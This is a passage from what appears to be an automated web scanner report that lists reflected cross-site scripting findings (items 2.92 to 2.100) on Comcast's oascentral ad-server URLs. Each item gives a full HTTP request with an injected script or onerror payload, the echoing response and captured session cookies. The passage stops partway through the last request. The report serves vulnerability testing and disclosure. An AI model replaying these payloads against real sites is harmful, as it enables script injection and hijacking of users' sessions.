This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 643
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net525df"><script>alert(1)</script>294ed56285c/home/L16/372205504/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.92. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590c0"><script>alert(1)</script>dcd9f109404 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home590c0"><script>alert(1)</script>dcd9f109404/L16/1670793816/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.93. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab9d"><script>alert(1)</script>2fc6280efcb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L167ab9d"><script>alert(1)</script>2fc6280efcb/L/2083215584/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.94. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647 was submitted in the REST URL parameter 8. This input was echoed as 85d34"><img src=a onerror=alert(1)>15c94468647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x3785d34"><img%20src%3da%20onerror%3dalert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 647
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1898369984/x3785d34"><img src=a onerror=alert(1)>15c94468647/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.95. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803ac"><script>alert(1)</script>0d9d2df3c86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/653231374/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?803ac"><script>alert(1)</script>0d9d2df3c86=1 HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 646
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
tral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1005352958/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&803ac"><script>alert(1)</script>0d9d2df3c86=1" WIDTH=2 HEIGHT=2>

2.96. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5455c"><script>alert(1)</script>6a987d872c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 779
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net5455c"><script>alert(1)</script>6a987d872c7/com-hp/2022363852/L35/286075359/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.97. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dc0c"><script>alert(1)</script>42084a2b583 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp1dc0c"><script>alert(1)</script>42084a2b583/2022363852/L35/1434151577/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.98. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126b9"><script>alert(1)</script>0c7d718d7cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 780
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852126b9"><script>alert(1)</script>0c7d718d7cb/L35/1460830530/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.99. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831fb"><script>alert(1)</script>848b3831af8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 781
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<SCRIPT language='JavaScript1.1' SRC="https://ad.doubleclick.net/adj/N5282.Comcast.net/B4587513.7;sz=300x250;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35831fb"><script>alert(1)</script>848b3831af8/L/982068884/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.100. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d was submitted in the REST URL parameter 9. This input was echoed as e696a"><img src=a onerror=alert(1)>850fbda351d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/yahoo.comcast.net/com-hp/2022363852/L35/268864316/x32e696a"><img%20src%3da%20onerror%3dalert(1)>850fbda351d/Comcast/Kroger264_201012_SIG_300_HOUS/300x250_RM_Kroger301_DenverRB_1122201010993794.html/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
